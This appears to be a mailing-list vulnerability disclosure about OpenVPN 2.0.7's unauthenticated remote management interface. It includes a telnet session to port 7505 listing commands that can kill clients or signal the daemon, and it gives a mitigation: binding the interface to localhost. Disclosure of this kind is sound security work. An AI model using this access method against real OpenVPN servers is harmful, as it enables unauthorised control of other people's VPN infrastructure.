Hi,

There is a flaw (well more a stupid design than anything else) in OpenVPN
2.0.7 (and below) in the the Remote Management Interface that allows an
attacker to gain complete control because there is NO AUTHENTICATION (YES NO
AUTHENTICATION AT ALL!).  This can be carried out from within the LAN that
the OpenVPN server is running on, over the VPN itself or via the internet. 
This happens
because the management interface can be binded to an internet accessible IP
address.  Not good!

Simply telnet to the OpenVPN server running the remote management interface
on port 7505.

root@trinity#  telnet ********* 7505
Trying *********...
Connected to *********.
Escape character is '^]'.
>INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
help
Management Interface for OpenVPN 2.0_rc14 i686-suse-linux [SSL] [LZO]
[EPOLL] built on Feb 3 2005
Commands:
echo [on|off] [N|all]  : Like log, but only show messages in echo buffer.
exit|quit              : Close management session.
help                   : Print this message.
hold [on|off|release]  : Set/show hold flag to on/off state, or
                         release current hold and start tunnel.
kill cn                : Kill the client instance(s) having common name cn.
kill IP:port           : Kill the client instance connecting from IP:port.
log [on|off] [N|all]   : Turn on/off realtime log display
                         + show last N lines or 'all' for entire history.
mute [n]               : Set log mute level to n, or show level if n is
absent.
net                    : (Windows only) Show network info and routing table.
password type p        : Enter password p for a queried OpenVPN password.
signal s               : Send signal s to daemon,
                         s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
state [on|off] [N|all] : Like log, but show state history.
status [n]             : Show current daemon status info using format #n.
test n                 : Produce n lines of output for testing/debugging.
username type u        : Enter username u for a queried OpenVPN username.
verb [n]               : Set log verbosity level to n, or show if n is
absent.
version                : Show current version number.
END
exit
Connection closed by foreign host.
root@trinity#

The fix?  Make sure you bind the remote management interface to 127.0.0.1 or
a local network address (however, the later will not stop you getting pwned
internally, obviously).

A quote from the OpenVPN guys themselves:

"The management protocol is currently cleartext without an explicit security
layer.  For this reason, it is recommended that the management interface
either listen on localhost (127.0.0.1) or on the local VPN address.  It's
possible to remotely connect to the management interface over the VPN
itself, though some capabilities will be limited in this mode, such as the
ability to provide private key passwords."

"Future versions of the management interface may allow out-of-band
connections (i.e. not over the VPN) and secured with SSL/TLS."

OMG *&$%*%# software vendors, please don't release stuff without
authentication!

c0redump
#hacktech @ undernet